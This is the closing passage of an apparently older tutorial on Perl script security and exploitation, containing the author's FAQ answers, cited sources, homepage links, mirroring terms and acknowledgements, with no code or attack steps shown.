      Answer:  I know that there are already a few papers covering perl security and common perl vulnerabilities, but I knew a few new tricks and found most of the other papers hard to understand with poor examples.  I also had a lot of friends who wantted to learn how to exploit scripts once they saw how fast I could find holes in theirs.  So after a few dozen emails asking questions about perl exploitation I decided just to write a tutorial and point people there instead.


20  Question:  "I would like to offer you money to work for my company as a perl coder or script audittor, will you do it?"

      Answer:  yes, I have no job and desperately need one.  I think I am pretty damn good at auditting scripts, and I can code in both php or perl securely.  Email b0iler@hotmail.com and give me the details.



Sources

          Jordan Dimov's article in phreedom zine - Security Issues in Perl Scripts
          Rain.Forrest.Puppy's article in phrack zine - Perl CGI problems
          Larry Wall, Tom Christiansen & Jon Orwant's book - Programming Perl
          Various testing by myself
          Sublime's song on second hand smoke - Had A Dat


[-----]

http://b0iler.eyeonsecurity.net/   - is my homepage (just moved there, thanks obscure).

I got tons of tutorials, mini-tutorials, advisories, and code written by me there.  Come check out what I'm up to and possibly learn a bit.  Also check out eyeonsecurity.net for obscure's interesting advisories and tutorials.  You'll love it.  I would like to give thanks to obscure for providing feedback which helped me improve this paper and to Cyrus for not eating it.  This tutorial was orignally wrote for http://blacksun.box.sk but anyone has permission to mirror it as long as it is mirrored in whole and proper credit is given to the author.  Also a link to http://b0iler.eyeonsecurity.net would be nice.

[-----]

"When your living life like a show you gotta take a bow to the people you know."